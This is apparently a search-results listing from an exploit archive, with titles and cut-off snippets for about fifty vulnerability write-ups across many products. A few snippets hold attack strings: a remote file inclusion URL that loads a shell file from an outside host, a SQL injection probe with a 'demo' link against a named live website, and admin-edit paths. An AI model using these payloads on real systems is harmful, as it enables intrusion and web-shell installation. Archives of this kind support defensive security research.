41207 matches found
Cisco Firepower Management Center 6.2.2.2 6.2.3 - Cross-Site Scripting
Cisco Firepower Management Center 6.2.2.2 6.2.3 - Cross-Site Scripting Exploit Title: Cisco Firepower Management Center Cross-Site Scripting XSS Vulnerability Google Dork: N/A Date: 23-01-2019 Exploit Author: Bhushan B. Patil Advisory URL:...
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem iohideventsystem is a MIG service which provides proxy access to various HID devices for untrusted clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is ...
ADB Broadband Gateways Routers - Privilege Escalation
ADB Broadband Gateways Routers - Privilege Escalation SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege escalation via linux group manipulation product: All ADB Broadband Gateways / Routers based on Epicentro...
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Google Dork: inurl:/Portal/Portal.mwsl Date: 2018-05-22 Exploit Author: t4rkd3vilz, Jameel Nabbo Vendor Homepage: https://www.siemens.com/ Version: SIMATIC S7-1500 CPU all...
RSA Authentication Manager 8.2.1.4.0-build1394922 8.3 P1 - XML External Entity Injection Cross-Site Flashing DOM Cross-Site Scripting
RSA Authentication Manager 8.2.1.4.0-build1394922 8.3 P1 - XML External Entity Injection Cross-Site Flashing DOM Cross-Site Scripting SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: XXE & XSS vulnerabilities product: R...
WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting
WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting Exploit Title: CalderaForms 1.5.9.1 - multiple XSS Date: 02-03-2018 Exploit Author: Federico Scalco fscalco at mentat dot is @mindpr00f Vendor Homepage: https://calderaforms.com/ Software Link:...
Primefaces 5.x - Remote Code Execution (Metasploit)
Primefaces 5.x - Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...
Oracle PeopleSoft 8.5x - Remote Code Execution
Oracle PeopleSoft 8.5x - Remote Code Execution Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 Date: 30 Oct 2017 Exploit Author: Vahagn Vardanyan Vendor Homepage: Oracle Software Link: Oracle PeopleSoft Version: 8.54, 8.55, 8.56 Tested on: Windows, Linux CVE :...
Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation
Realtek Audio Driver 6.0.1.7898 Windows 10 - Dolby Audio X2 Service Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075 Windows: Dolby Audio X2 Service Elevation of Privilege Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 on a Lenovo P50...
HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting Remote File Inclusion
HPE OpenCall Media Platform OCMP 4.3.2 - Cross-Site Scripting Remote File Inclusion Source: https://blogs.securiteam.com/index.php/archives/3087 SSD Advisory – HPE OpenCall Media Platform OCMP Multiple Vulnerabilities Want to get paid for a vulnerability similar to this one? Contact us at:...
Concrete5 CMS 8.1.0 - Host Header Injection
Concrete5 CMS 8.1.0 - Host Header Injection + Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.concrete5.org Product:...
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities
Trend Micro InterScan Web Security Virtual Appliance IWSVA 6.5 - Multiple Vulnerabilities Exploit Title: Trend Micro Interscan Web Security Virtual Appliance IWSVA 6.5.x Multiple Vulnerabilities Date: 28/11/2016 Exploit Author: SlidingWindow , Twitter: @KapilKhot Vendor Homepage:...
Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation
Apache Tomcat 876 Debian-Based Distros - Local Privilege Escalation ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - CVE-2016-1240 - Release date: 30.09.2016 - Revision: 1 - Severity: High...
Zen Cart 1.5.4 - Local File Inclusion
Zen Cart 1.5.4 - Local File Inclusion Advisory ID: HTB23282 Product: Zen Cart Vendor: Zen Ventures, LLC Vulnerable Versions: 1.5.4 Tested Version: 1.5.4 Advisory Publication: November 25, 2015 without technical details Vendor Notification: November 25, 2015 Vendor Patch: November 26, 2015 Public...
Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)
Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free MS15-124 small -ms-block-progression: lr; -ms-filter: "vv";...
ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting
ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting Title: =============== ManageEngine Asset Explorer v6.1 - XSS Vulnerability CVE-ID: ==================================== CVE-2015-2169 CVSS: ==================================== 3.5 Product & Service Introduction Taken from their...
ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities
ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 Discovered by Pedro Ribeiro [email protected], Agile Information Security...
Android WiFi-Direct - Denial of Service
Android WiFi-Direct - Denial of Service Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Android WiFi-Direct Denial of Service 1. Advisory Information Title: Android WiFi-Direct Denial of Service Advisory ID: CORE-2015-0002 Advisory URL:...
vldPersonals 2.7 - Multiple Vulnerabilities
vldPersonals 2.7 - Multiple Vulnerabilities Exploit Title: VLD Personal – Multiple Vulnerabilities Date: 09/11/2014 Exploit Author: Mr T Exploit Authors Website: http://www.securitypentester.ninja Vendor Homepage: http://www.vldpersonals.com/ Software Link:...
Multiple WordPress Themes - admin-ajax.php?img Arbitrary File Download
Multiple WordPress Themes - admin-ajax.php?img Arbitrary File Download WordPress CuckooTap Theme & eShop Arbitrary File Download Risk: High CWE number: CWE-200 Author: Hugo Santiago Contact: [email protected] Date: 31/08/2014 Vendor Homepage:...
Flussonic Media Server 4.1.25 4.3.3 - Arbitrary File Disclosure
Flussonic Media Server 4.1.25 4.3.3 - Arbitrary File Disclosure Document Title: ============ Flussonic Media Server 4.3.3 Multiple Vulnerabilities Release Date: =========== June 29, 2014 Product & Service Introduction: ======================== Flussonic is a multi-protocol streaming server with...
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities --------------------------------------------------------------------------------- vtiger CRM debug"Entering customer portal function getlistvalues"; 2 The vulnerable code is located in the getprojectcomponents SOAP method defined in...
banana dance b.2.6 - Multiple Vulnerabilities
banana dance b.2.6 - Multiple Vulnerabilities Advisory ID: HTB23118 Product: Banana Dance Vendor: bananadance.org Vulnerable Versions: B.2.6 and probably prior Tested Version: B.2.6 Vendor Notification: October 3, 2012 Public Disclosure: December 19, 2012 Vulnerability Type: PHP File Inclusion...
GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation
GNU C Library 2.x libc6 - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation Source: http://marc.info/?l=full-disclosure&m=128776663124692&w=2 The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads...
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
Microsoft Cinepak Codec CVDecompress - Heap Overflow MS10-055 http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/ Title :...
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35 newest as of release Vendor's Website:http://phpnuke.org/ Security Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
DMXReady Faqs Manager 1.1 - Remote Contents Change
DMXReady Faqs Manager 1.1 - Remote Contents Change Title : DMXReady Faqs Manager http://target/path//applications/FaqsManager/incfaqsmanager.asp Edit - http://target/path//admin/FaqsManager/addcategory.asp : milw0rm.com 2009-01-14...
Joomla! Component com_colorlab 1.0 - Remote File Inclusion
Joomla! Component com_colorlab 1.0 - Remote File Inclusion -------------------- Joomla com_colorlab Remote File Include -------------------- Found : xoron -------------------- Download: http://download.joomlaportal.ch/content/view/474/ -------------------- Wrong Code: include...
Squirrelcart 1.x - cart.php Remote File Inclusion
Squirrelcart 1.x - cart.php Remote File Inclusion Title : Squirrelcart config.php, line 13 - $siteisproot = "blablabla"; Exploit : squirrelcart//popupwindow.php?siteisproot=http://example.com/shell.txt? notes : registerglobals = off is needed it seems. milw0rm.com 2007-08-19...
Cartweaver 2.16.11 - ProdID SQL Injection
Cartweaver 2.16.11 - ProdID SQL Injection author:meoconxatvnbrain.net product:CartWeaver main site:www.cartweaver.com 1.with CFM CartWeaver: sql injection in: Details.cfm?ProdID=a' demo: http://www.jbracing.co.uk/Details.cfm?ProdID=1' exploit: http://www.xxx.com/Details.cfm?ProdID=sql query link...
Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion
Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion VIRANGAR SECURITY TEAM Discovered By : A.nosrati www.virangar.org Public www.virangar.net Priv8 Mail: infoatvirangar.net Sabdrimer PRO v.2.2.4 Remote File Include Vulnerability Google Dork : "© Sabdrimer CMS" bug found in file : advanced1.php...
Apache 2.0.52 - GET Denial of Service
Apache 2.0.52 - GET Denial of Service !/usr/bin/perl Based on - apache-squ1rt.c exploit. Original credit goes to Chintan Trivedi on the FullDisclosure mailing list: http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html More info -...
JetBrains TeamCity 2018.2.4 - Remote Code Execution
JetBrains TeamCity 2018.2.4 - Remote Code Execution Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution Date: 2020-01-07 Exploit Author: Harrison Neal Vendor Homepage: https://www.jetbrains.com/ Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads...
Roxy Fileman 1.4.5 - Directory Traversal
Roxy Fileman 1.4.5 - Directory Traversal Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal Author: Patrik Lantz Date: 2019-12-06 Software: Roxy Fileman Version: 1.4.5 Vendor Homepage: http://www.roxyfileman.com/ Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net CVE:...
Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
Optergy 2.3.0a - Cross-Site Request Forgery Add Admin Title: Optergy 2.3.0a - Cross-Site Request Forgery Add Admin Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: history.pushState'', '', '/' input type="hidden"...
Adrenalin Core HCM 5.4.0 - ReportID Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - ReportID Reflected Cross-Site Scripting Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting Google Dork: NA Date: 2018-09-06 Exploit Author: Rishu Ranjan Vendor Homepage: https://www.myadrenalin.com/ Software Link:...
Optergy 2.3.0a - Username Disclosure
Optergy 2.3.0a - Username Disclosure Title: Optergy 2.3.0a - Username Disclosure Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: djuro teppi view alerton stef humba drmio de3 andri myko dzonka kosto beebee...
TortoiseSVN 1.12.1 - Remote Code Execution
TortoiseSVN 1.12.1 - Remote Code Execution Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2188 Product:...
Android 7 - 9 VideoPlayer - ihevcd_parse_pps Out-of-Bounds Write
Android 7 - 9 VideoPlayer - ihevcd_parse_pps Out-of-Bounds Write CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video with tiles enabled - pspps-i1tilesenabledflag you can...
Iperius Backup 6.1.0 - Privilege Escalation
Iperius Backup 6.1.0 - Privilege Escalation Exploit Author: bzyo Twitter: @bzyo Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation Date: 04-24-19 Vulnerable Software: Iperius Backup 6.1.0 Vendor Homepage: https://www.iperiusbackup.com/ Version: 6.1.0 Software Link:...
ASRock Drivers - Privilege Escalation
ASRock Drivers - Privilege Escalation SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASRock Drivers Elevation of Privilege Vulnerabilities 1. Advisory Information Title: ASRock Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2018-0005 Advisory URL:...
Bayanno Hospital Management System 4.0 - Cross-Site Scripting
Bayanno Hospital Management System 4.0 - Cross-Site Scripting Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting Date: 2018-09-05 Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621 Exploit Author: Gokhan Sagoglu Vendor Homepage::...
Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)
Drupal 7.58 - Drupalgeddon3 Authenticated Remote Code Execution PoC This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in...
WSO2 Carbon WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting
WSO2 Carbon WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Stored XSS Vulnerabilities product: WSO2 Carbon, WSO2 Dashboard Server vulnerable...
PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)
PRTG Network Monitor 18.1.39.1648 - Stack Overflow Denial of Service Exploit Title: PRTG 18.1.39.1648 - Stack Overflow Date: 2018-04-21 Exploit Author: Lucas "luriel" Carmo Vendor Homepage: https://www.paessler.com/prtg Software Link: https://www.paessler.com/download/prtg-download Version:...
Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow
Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE Date: 03-29-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage:...
Laravel Log Viewer 0.13.0 - Local File Download
Laravel Log Viewer 0.13.0 - Local File Download Exploit Title: Laravel log viewer by rap2hpoutre local file download LFD Date: 23/02/2018 Exploit Author: Haboob Team Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1 Version: v0.12.0 and below CVE : CVE-2018-8947 1...
HP iMC Plat 7.2 - Remote Code Execution (2)
HP iMC Plat 7.2 - Remote Code Execution 2 !/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE Date: 11-29-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
Trend Micro OfficeScan 11.0XG (12.0) - Memory Corruption
Trend Micro OfficeScan 11.0XG 12.0 - Memory Corruption + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt + ISR: ApparitionSec Vendor:...
Automated Logic WebCTRL 6.1 - Path Traversal Arbitrary File Write
Automated Logic WebCTRL 6.1 - Path Traversal Arbitrary File Write Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write Vendor: Automated Logic Corporation Product web page: http://www.automatedlogic.com Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior ALC WebCTRL, i-Vu 6.0 and...